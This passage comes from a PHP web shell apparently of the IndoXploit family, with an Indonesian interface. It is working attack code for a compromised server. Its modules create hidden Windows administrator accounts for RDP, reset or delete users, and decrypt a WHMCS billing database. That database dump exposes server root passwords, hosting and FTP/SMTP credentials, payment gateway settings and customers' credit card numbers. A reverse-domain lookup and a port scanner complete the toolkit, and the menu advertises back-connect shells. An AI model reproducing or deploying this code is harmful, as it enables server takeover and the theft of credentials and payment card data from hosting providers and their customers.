  3052. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3053. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3054. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3055. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3056. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3057. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3058. echo "</ul>";
  3059. echo "</center>";
  3060.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  3061.         if($_POST['create']) {
  3062.             $user = htmlspecialchars($_POST['user']);
  3063.             $pass = htmlspecialchars($_POST['pass']);
  3064.             if(preg_match("/$user/", exe("net user"))) {
  3065.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  3066.             } else {
  3067.                 $add_user   = exe("net user $user $pass /add");
  3068.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  3069.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  3070.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  3071.                 echo "<center>[ RDP ACCOUNT INFO ]<br>
  3072.                 ------------------------------<br>
  3073.                 IP: <font color=lime>".$ip."</font><br>
  3074.                 Username: <font color=lime>$user</font><br>
  3075.                 Password: <font color=lime>$pass</font><br>
  3076.                 ------------------------------<br><br>
  3077.                 [ STATUS ]<br>
  3078.                 ------------------------------<br>
  3079.                 </center>";
  3080.                 if($add_user) {
  3081.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  3082.                 } else {
  3083.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  3084.                 }
  3085.                 if($add_groups1) {
  3086.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  3087.                 } elseif($add_groups2) {
  3088.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  3089.                 } elseif($add_groups3) {
  3090.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  3091.                 } else {
  3092.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  3093.                 }
  3094.                 echo "------------------------------<br>";
  3095.             }
  3096.         } elseif($_POST['s_opsi']) {
  3097.             $user = htmlspecialchars($_POST['r_user']);
  3098.             if($_POST['opsi'] == '1') {
  3099.                 $cek = exe("net user $user");
  3100.                 echo "Checking username <font color=lime>$user</font> ....... ";
  3101.                 if(preg_match("/$user/", $cek)) {
  3102.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
  3103.                     ------------------------------<br><br>
  3104.                     <pre>$cek</pre>";
  3105.                 } else {
  3106.                     echo "[ <font color=red>belum ada</font> ]";
  3107.                 }
  3108.             } elseif($_POST['opsi'] == '2') {
  3109.                 $cek = exe("net user $user indoxploit");
  3110.                 if(preg_match("/$user/", exe("net user"))) {
  3111.                     echo "[change password: <font color=lime>indoxploit</font>] -> ";
  3112.                     if($cek) {
  3113.                         echo "<font color=lime>Berhasil</font>";
  3114.                     } else {
  3115.                         echo "<font color=red>Gagal</font>";
  3116.                     }
  3117.                 } else {
  3118.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  3119.                 }
  3120.             } elseif($_POST['opsi'] == '3') {
  3121.                 $cek = exe("net user $user /DELETE");
  3122.                 if(preg_match("/$user/", exe("net user"))) {
  3123.                     echo "[remove user: <font color=lime>$user</font>] -> ";
  3124.                     if($cek) {
  3125.                         echo "<font color=lime>Berhasil</font>";
  3126.                     } else {
  3127.                         echo "<font color=red>Gagal</font>";
  3128.                     }
  3129.                 } else {
  3130.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  3131.                 }
  3132.             } else {
  3133.                 //
  3134.             }
  3135.         } else {
  3136.             echo "<center>-- Create RDP --<br>
  3137.             <form method='post'>
  3138.             <input type='text' name='user' placeholder='username' value='denita' required>
  3139.             <input type='text' name='pass' placeholder='password' value='denita' required>
  3140.             <input type='submit' name='create' value='>>'>
  3141.             </form>
  3142.             -- Option --<br>
  3143.             <form method='post'>
  3144.             <input type='text' name='r_user' placeholder='username' required>
  3145.             <select name='opsi'>
  3146.             <option value='1'>Cek Username</option>
  3147.             <option value='2'>Ubah Password</option>
  3148.             <option value='3'>Hapus Username</option>
  3149.             </select>
  3150.             <input type='submit' name='s_opsi' value='>>'>
  3151.             </form></center>
  3152.             ";
  3153.         }
  3154.     } else {
  3155.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  3156.     }
  3157.  
  3158. }
  3159. elseif($_GET['do'] == 'tetangga') {
  3160. echo "<center>";
  3161. echo "<ul>";
  3162. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3163. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3164. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3165. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3166. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3167. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3168. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3169. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3170. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3171. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3172. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3173. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3174. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3175. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3176. echo "</ul>";
  3177. echo "</center>";
  3178.  
  3179.          echo "<center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Reverse Domain ip Lookup</span></center>
  3180.         ";
  3181.         echo "<div id=result>";
  3182.         echo "<center><br><form><input type='text' size='60' placeholder='watch8x.com' name='setan' /><input type='hidden' name='do' value='tetangga'> &nbsp;<input type='submit' value='&nbsp;&check;&nbsp;'></form></center>";
  3183.         if(isset($_GET["setan"]))
  3184.         {
  3185.         $site = $_GET["setan"];
  3186.         $setan = "http://domains.yougetsignal.com/domains.php";
  3187.  
  3188.         //Curl Function
  3189.         $ch = curl_init($setan);
  3190.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3191.         curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$site&ket=");
  3192.         curl_setopt($ch, CURLOPT_HEADER, 0);
  3193.         curl_setopt($ch, CURLOPT_POST, 1);
  3194.         $resp = curl_exec($ch);
  3195.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3196.         $array = explode(",,", $resp);
  3197.         unset($array[0]);
  3198.         echo "<table style='margin: 0 auto'>";
  3199.         foreach($array as $lnk)
  3200.         {
  3201.             print "<tr><td><a  style=\"color:#0f0;font-weight:bold;\" href='$lnk' target=_blank>$lnk</a></td></tr>";
  3202.         }
  3203.         echo "</table>";
  3204.         curl_close($ch);
  3205.         }
  3206. }
  3207. elseif($_GET['do'] == 'whmcs') {
  3208. echo "<center>";
  3209. echo "<ul>";
  3210. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3211. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3212. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3213. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3214. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3215. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3216. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3217. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3218. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3219. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3220. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3221. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3222. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3223. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3224. echo "</ul>";
  3225. echo "</center>";
  3226.  
  3227.     echo"<p><br/><body>
  3228.     <center><br/><br/><nobr><b><span>WHMCS DECODER</span></b></nobr><br/><br/>
  3229.     <p><form method='post'>
  3230.     <table border=1>
  3231.     <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu1' value='localhost'></td></tr>
  3232.     <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu2'></td></tr>
  3233.     <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu3'></td></tr>
  3234.     <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu4'></td></tr>
  3235.     <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:transparent' type='text' size='60' name='anu5'></td></tr>
  3236.     <tr><td align='center' colspan='2'><input class=submit type='submit' style='color:#FF0000;background-color:transparent' value=' HAJAR ' name='plapon'></td></tr>
  3237.      
  3238.     </table>
  3239.     <br></form></center>";
  3240.  
  3241.  
  3242.         $perawan = $_POST['anu1'];
  3243.         $kimcil = $_POST['anu2'];
  3244.         $janda = $_POST['anu3'];
  3245.         $hotel = $_POST['anu4'];
  3246.         $kondom = $_POST['anu5'];
  3247.         @mysql_connect($perawan, $kimcil, $janda);
  3248.         @mysql_select_db($hotel);
  3249.         $cc_encryption_hash = $kondom;
  3250.         function dec($string, $cc_encryption_hash) {
  3251.             $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
  3252.             $hash_key = _hash($key);
  3253.             $hash_length = strlen($hash_key);
  3254.             $string = base64_decode($string);
  3255.             $tmp_iv = substr($string, 0, $hash_length);
  3256.             $string = substr($string, $hash_length, strlen($string) - $hash_length);
  3257.             $iv = $out = '';
  3258.             $c = 0;
  3259.             while ($c < $hash_length) {
  3260.                 $iv.= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
  3261.                 ++$c;
  3262.             }
  3263.             $key = $iv;
  3264.             $c = 0;
  3265.             while ($c < strlen($string)) {
  3266.                 if (($c != 0 AND $c % $hash_length == 0)) {
  3267.                     $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
  3268.                 }
  3269.                 $out.= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
  3270.                 ++$c;
  3271.             }
  3272.             return $out;
  3273.         }
  3274.         function _hash($string) {
  3275.             $hash = (function_exists('sha1')) ? sha1($string) : md5($string);
  3276.             $out = '';
  3277.             $c = 0;
  3278.             while ($c < strlen($hash)) {
  3279.                 $out.= chr(hexdec($hash[$c] . $hash[$c + 1]));
  3280.                 $c+= 2;
  3281.             }
  3282.             return $out;
  3283.         }
  3284.         ########  GO TO HELL ########
  3285.         ##### :D ########### :D #####
  3286.         if (isset($_POST['plapon'])) {
  3287.             $query = mysql_query("SELECT *FROM tblservers");
  3288.             echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3289.     <tr><th colspan='7'> <span> HOST ROOT </span> </th></tr>
  3290.     <tr>
  3291.     <th class='th_home' align='center'><b>TYPE</b></th>
  3292.     <th class='th_home' align='center'><b>ACTIVE</b></th>
  3293.     <th class='th_home' align='center'><b>HOSTNAME</b></th>
  3294.     <th class='th_home' align='center'><b>IP ADDRESS</b></th>
  3295.     <th class='th_home' align='center'><b>USERNAME</b></th>
  3296.     <th class='th_home' align='center'><b>PASSWORD</b></th>
  3297.     <th class='th_home' align='center'><b>ACCESS HASH</b></th></tr>";
  3298.             if (!is_array(mysql_fetch_array($query))) {
  3299.                 echo "<tr><td colspan='8' align='center'>Nothing Found !</td></tr>";
  3300.             }
  3301.             while ($v = mysql_fetch_array($query)) {
  3302.                 echo "<tr>
  3303.     <td class='td_home' align='center'>{$v['type']}</td>
  3304.     <td class='td_home' align='center'>{$v['active']}</td>
  3305.     <td class='td_home' align='center'>{$v['hostname']}</td>
  3306.     <td class='td_home' align='center'>{$v['ipaddress']}</td>
  3307.     <td class='td_home' align='center'>{$v['username']}</td>
  3308.     <td class='td_home' align='center'>" . dec($v['password'], $cc_encryption_hash) . "</td>
  3309.     <td class='td_home' align='center'>{$v['accesshash']}</td>
  3310.     </tr>";
  3311.             }
  3312.             echo "</table>";
  3313.             $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'vmuserxx' or username = 'vmuser' or username = 'admin' or username = 'Admin' or username = 'administrator' or username = 'Administrator' order by domainstatus");
  3314.             echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3315.     <tr><th colspan='6'><span>CLIENTS ROOT</span> </th></tr>
  3316.      
  3317.     <tr>
  3318.     <th class='th_home' align='center'><b> DOMAIN</b></th>
  3319.     <th class='th_home' align='center'><b> STATUS</b></th>
  3320.     <th class='th_home' align='center'><b> USERNAME</b></th>
  3321.     <th class='th_home' align='center'><b> PASSWORD</b></th>
  3322.     <th class='th_home' align='center'><b> DEDICATED IP</b></th>
  3323.     <th class='th_home' align='center'><b> ASSIGNED IP</b></th></tr>";
  3324.             if (!is_array(mysql_fetch_array($query))) {
  3325.                 echo "<tr><td colspan='6' align='center'>Nothing Found ! :(</td></tr>";
  3326.             }
  3327.             while ($v = mysql_fetch_array($query)) {
  3328.                 echo "<tr>
  3329.     <td class='td_home' align='center'> {$v['domain']}</td>
  3330.     <td class='td_home' align='center'> {$v['domainstatus']}</td>
  3331.     <td class='td_home' align='center'> {$v['username']}</td>
  3332.     <td class='td_home' align='center'> " . dec($v['password'], $cc_encryption_hash) . "</td>
  3333.     <td class='td_home' align='center'> {$v['dedicatedip']}</td>
  3334.     <td class='td_home' align='center'> {$v['assignedips']}</td></tr>";
  3335.             }
  3336.             echo "</table>";
  3337.             $query = mysql_query("SELECT *FROM tblregistrars");
  3338.             echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3339.     <tr><th colspan='3'><nobr><span> DOMAIN REGISTRAR </span></nobr></th></tr>
  3340.     <tr>
  3341.     <th class='th_home' align='center'><b>REGISTRAR</b></th>
  3342.     <th class='th_home' align='center'><b>SETTING</b></th>
  3343.     <th class='th_home' align='center'><b>VALUE</b></th></tr>";
  3344.             if (!is_array(mysql_fetch_array($query))) {
  3345.                 echo "<tr><td colspan='3' align='center'>Nothing Found !</td></tr>";
  3346.             }
  3347.             while ($v = mysql_fetch_array($query)) {
  3348.                 $value = (!dec($v['value'], $cc_encryption_hash)) ? "0" : dec($v['value'], $cc_encryption_hash);
  3349.                 echo "<tr>
  3350.     <td class='td_home' align='center'>{$v['registrar']}</td>
  3351.     <td class='td_home' align='center'>{$v['setting']}</td>
  3352.     <td class='td_home' align='center'>$value</td></tr>";
  3353.             }
  3354.             echo "</table>";
  3355.             $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  3356.             echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3357.     <tr><th colspan='4'> <span> FTP BACKUP </span> </th></tr>
  3358.      
  3359.     <tr>
  3360.     <th class='th_home' align='center'><b>FTP HOSTNAME</b></th>
  3361.     <th class='th_home' align='center'><b>FTP USERNAME</b></th>
  3362.     <th class='th_home' align='center'><b>FTP PASSWORD</b></th>
  3363.     <th class='th_home' align='center'><b>DESTINATION</b></th></tr>";
  3364.             $ftpb = array('FTPBackupHostname', 'FTPBackupUsername', 'FTPBackupPassword', 'FTPBackupDestination');
  3365.             if (!is_array(mysql_fetch_array($query))) {
  3366.                 echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
  3367.             }
  3368.             while ($row = mysql_fetch_array($query)) {
  3369.                 if ($row[setting] == $ftpb[0]) {
  3370.                     echo "<tr><td class='td_home'>{$row[value]}</td>";
  3371.                     $ftpb[0] = xxx;
  3372.                 } elseif ($row[setting] == $ftpb[1]) {
  3373.                     echo "<td class='td_home'>{$row[value]}</td>";
  3374.                     $ftpb[1] = xxx;
  3375.                 } elseif ($row[setting] == $ftpb[2]) {
  3376.                     echo "<td class='td_home'>{$row[value]}</td>";
  3377.                     $ftpb[2] = xxx;
  3378.                 } elseif ($row[setting] == $ftpb[3]) {
  3379.                     echo "<td class='td_home'>{$row[value]}</td>";
  3380.                     $ftpb[3] = xxx;
  3381.                 }
  3382.             }
  3383.             echo "</table>";
  3384.             $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  3385.             echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3386.     <tr><th colspan='4'><span> SMTP SERVER </span> </th></tr>
  3387.     <tr>
  3388.     <th class='th_home' align='center'><b>SMTP HOST</b></th>
  3389.     <th class='th_home' align='center'><b>SMTP USER</b></th>
  3390.     <th class='th_home' align='center'><b>SMTP PASS</b></th>
  3391.     <th class='th_home' align='center'><b>SMTP PORT</b></th></tr>";
  3392.             $smtp = array('SMTPHost', 'SMTPUsername', 'SMTPPassword', 'SMTPPort');
  3393.             if (!is_array(mysql_fetch_array($query))) {
  3394.                 echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
  3395.             }
  3396.             while ($row = mysql_fetch_array($query)) {
  3397.                 if ($row[setting] == $smtp[0]) {
  3398.                     echo "<tr><td class='td_home'>{$row[value]}</td>";
  3399.                     $smtp[0] = xxx;
  3400.                 } elseif ($row[setting] == $smtp[1]) {
  3401.                     echo "<td class='td_home'>{$row[value]}</td>";
  3402.                     $smtp[1] = xxx;
  3403.                 } elseif ($row[setting] == $smtp[2]) {
  3404.                     echo "<td class='td_home'>{$row[value]}</td>";
  3405.                     $smtp[2] = xxx;
  3406.                 } elseif ($row[setting] == $smtp[3]) {
  3407.                     echo "<td class='td_home'>{$row[value]}</td>";
  3408.                     $smtp[3] = xxx;
  3409.                 }
  3410.             }
  3411.             echo "</table>";
  3412.             $query = mysql_query("SELECT *FROM tblpaymentgateways");
  3413.             echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3414.     <tr><th colspan='4'><nobr><span> PAYMENTS GATEWAY </span></nobr></th></tr>
  3415.      
  3416.     <tr>
  3417.     <th class='th_home' align='center'><b>GATEWAY</b></th>
  3418.     <th class='th_home' align='center'><b>SETTING</b></th>
  3419.     <th class='th_home' align='center'><b>VALUE</b></th>
  3420.     <th class='th_home' align='center'><b>ORDER</b></th></tr>";
  3421.             if (!is_array(mysql_fetch_array($query))) {
  3422.                 echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
  3423.             }
  3424.             while ($v = mysql_fetch_array($query)) {
  3425.                 echo "<tr>
  3426.     <td class='td_home' align='center'>{$v['gateway']}</td>
  3427.     <td class='td_home' align='center'>{$v['setting']}</td>
  3428.     <td class='td_home' align='center'>{$v['value']}</td>
  3429.     <td class='td_home' align='center'>{$v['order']}</td> </tr>";
  3430.             }
  3431.             echo "</table>";
  3432.             $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
  3433.             echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3434.     <tr><th colspan='10'><nobr><span> CLIENTS CREDIT CARD </span></nobr></th></tr>
  3435.     <tr>
  3436.     <th class='th_home' align='center'><b>CardType</b></th>
  3437.     <th class='th_home' align='center'><b>CardNumb</b></th>
  3438.     <th class='th_home' align='center'><b>Expdate</b></th>
  3439.     <th class='th_home' align='center'><b>IssueNumber</b></th>
  3440.     <th class='th_home' align='center'><b>FirstName</b></th>
  3441.     <th class='th_home' align='center'><b>LastName</b></th>
  3442.     <th class='th_home' align='center'><b>Address</b></th>
  3443.     <th class='th_home' align='center'><b>Country</b></th>
  3444.     <th class='th_home' align='center'><b>Phone</b></th>
  3445.     <th class='th_home' align='center'><b>Email</b></th>
  3446.     </tr>";
  3447.             if (!is_array(mysql_fetch_array($query))) {
  3448.                 echo "<tr><td colspan='10' align='center'>Nothing Found ! :(</td></tr>";
  3449.             }
  3450.             while ($v = mysql_fetch_array($query)) {
  3451.                 $cchash = md5($cc_encryption_hash . $v['0']);
  3452.                 $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='" . $v['0'] . "'");
  3453.                 $v2 = mysql_fetch_array($s);
  3454.                 echo "<tr>
  3455.     <td class='td_home' align='center'>" . $v2['cardtype'] . "</td>
  3456.     <td class='td_home' align='center'>" . $v2['cardnum'] . "</td>
  3457.     <td class='td_home' align='center'>" . $v2['expdate'] . "</td>
  3458.     <td class='td_home' align='center'>" . $v2['issuenumber'] . "</td>
  3459.     <td class='td_home' align='center'>" . $v2['firstname'] . "</td>
  3460.     <td class='td_home' align='center'>" . $v2['lastname'] . "</td>
  3461.     <td class='td_home' align='center'>" . $v2['address1'] . "</td>
  3462.     <td class='td_home' align='center'>" . $v2['country'] . "</td>
  3463.     <td class='td_home' align='center'>" . $v2['phonenumber'] . "</td>
  3464.     <td class='td_home' align='center'>" . $v2['email'] . "</td></tr>";
  3465.             }
  3466.             echo "</table>";
  3467.             $query = mysql_query("SELECT *FROM tblhosting");
  3468.             echo "<br/><br/><center>
  3469.     <table class='table_home' style=width:830px;padding:0 1px;>
  3470.     <tr><th colspan='6'><nobr><span> CLIENTS HOSTING ACCOUNT </span></nobr></th></tr>
  3471.     <tr>
  3472.     <th class='th_home' align='center'><b>DOMAIN</b></th>
  3473.     <th class='th_home' align='center'><b>STATUS</b></th>
  3474.     <th class='th_home' align='center'><b>USERNAME</b></th>
  3475.     <th class='th_home' align='center'><b>PASSWORD</b></th>
  3476.     <th class='th_home' align='center'><b>DEDICATED IP</b></th>
  3477.     <th class='th_home' align='center'><b>ASSIGNED IP</b></th></tr>";
  3478.             if (!is_array(mysql_fetch_array($query))) {
  3479.                 echo "<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
  3480.             }
  3481.             while ($v = mysql_fetch_array($query)) {
  3482.                 echo "<tr>
  3483.     <td class='td_home' align='center'>{$v['domain']}</td>
  3484.     <td class='td_home' align='center'>{$v['domainstatus']}</td>
  3485.     <td class='td_home' align='center'>{$v['username']}</td>
  3486.     <td class='td_home' align='center'>" . dec($v['password'], $cc_encryption_hash) . "</td>
  3487.     <td class='td_home' align='center'>{$v['dedicatedip']}</td>
  3488.     <td class='td_home' align='center'>{$v['assignedips']}</td></tr>";
  3489.             }
  3490.             echo "</table>";
  3491.         }
  3492. }
  3493. elseif($_GET['do'] == 'hash') {
  3494. echo "<center>";
  3495. echo "<ul>";
  3496. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3497. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3498. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3499. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3500. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3501. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3502. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3503. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3504. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3505. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3506. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3507. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3508. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3509. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3510. echo "</ul>";
  3511. echo "</center>";
  3512.     if (isset($_POST['gethash'])) {
  3513.         $hash = $_POST['hash'];
  3514.         if (strlen($hash) == 32) {
  3515.             $hashresult = "MD5 Hash";
  3516.         } elseif (strlen($hash) == 40) {
  3517.             $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  3518.         } elseif (strlen($hash) == 13) {
  3519.             $hashresult = "DES(Unix) Hash";
  3520.         } elseif (strlen($hash) == 16) {
  3521.             $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  3522.         } elseif (strlen($hash) == 41) {
  3523.             $GetHashChar = substr($hash, 40);
  3524.             if ($GetHashChar == "*") {
  3525.                 $hashresult = "MySQL5 Hash";
  3526.             }
  3527.         } elseif (strlen($hash) == 64) {
  3528.             $hashresult = "SHA-256 Hash";
  3529.         } elseif (strlen($hash) == 96) {
  3530.             $hashresult = "SHA-384 Hash";
  3531.         } elseif (strlen($hash) == 128) {
  3532.             $hashresult = "SHA-512 Hash";
  3533.         } elseif (strlen($hash) == 34) {
  3534.             if (strstr($hash, '$1$')) {
  3535.                 $hashresult = "MD5(Unix) Hash";
  3536.             }
  3537.         } elseif (strlen($hash) == 37) {
  3538.             if (strstr($hash, '$apr1$')) {
  3539.                 $hashresult = "MD5(APR) Hash";
  3540.             }
  3541.         } elseif (strlen($hash) == 34) {
  3542.             if (strstr($hash, '$H$')) {
  3543.                 $hashresult = "MD5(phpBB3) Hash";
  3544.             }
  3545.         } elseif (strlen($hash) == 34) {
  3546.             if (strstr($hash, '$P$')) {
  3547.                 $hashresult = "MD5(Wordpress) Hash";
  3548.             }
  3549.         } elseif (strlen($hash) == 39) {
  3550.             if (strstr($hash, '$5$')) {
  3551.                 $hashresult = "SHA-256(Unix) Hash";
  3552.             }
  3553.         } elseif (strlen($hash) == 39) {
  3554.             if (strstr($hash, '$6$')) {
  3555.                 $hashresult = "SHA-512(Unix) Hash";
  3556.             }
  3557.         } elseif (strlen($hash) == 24) {
  3558.             if (strstr($hash, '==')) {
  3559.                 $hashresult = "MD5(Base-64) Hash";
  3560.             }
  3561.         } else {
  3562.             $hashresult = "Hash type not found";
  3563.         }
  3564.     } else {
  3565.         $hashresult = "<center>Not Hash Entered</center>";
  3566.     }
  3567.  
  3568.     echo"<center>
  3569.    
  3570.         <form action='' method='POST'>
  3571.         <tr>
  3572.         <th colspan='5'>Hash Identification</th><br><br>
  3573.         <tr class='optionstr'><B><td>Enter Hash :</td><br></b><td></td> <td><input type='text' name='hash' size='60' class='inputz' /></td><td><input type='submit' class='inputzbut' name='gethash' value='Identify Hash' /></td></tr><br>
  3574.         <tr class='optionstr'><b><td>Result</td><td>:</td><td></td></tr></b>
  3575.     </tr></form>
  3576.     </center>";
  3577.     echo "<center>$hashresult</center>";
  3578.  
  3579. }
  3580. elseif($_GET['do'] == 'portsc') {
  3581. echo "<center>";
  3582. echo "<ul>";
  3583. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3584. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3585. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3586. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3587. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3588. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3589. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3590. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3591. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3592. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3593. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3594. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3595. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3596. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3597. echo "</ul>";
  3598. echo "</center>";
  3599.     echo"<form action='' method='post'>"              ;
  3600.     $start = strip_tags($_POST['start']);
  3601.     $end = strip_tags($_POST['end']);
  3602.     $host = strip_tags($_POST['host']);
  3603.     if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])) {
  3604.         for ($i = $start;$i <= $end;$i++) {
  3605.             $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  3606.             if ($fp) {
  3607.                 echo 'Port ' . $i . ' is <font color=green>open</font><br>';
  3608.             }
  3609.             flush();
  3610.         }
  3611.     } else {
  3612.         echo '<center><table class=tabnet style="width:300px;padding:0 1px;">
  3613.    <input type="hidden" name="y" value="phptools">
  3614.    <tr><th colspan="5">Port Scanner</th></center></tr>
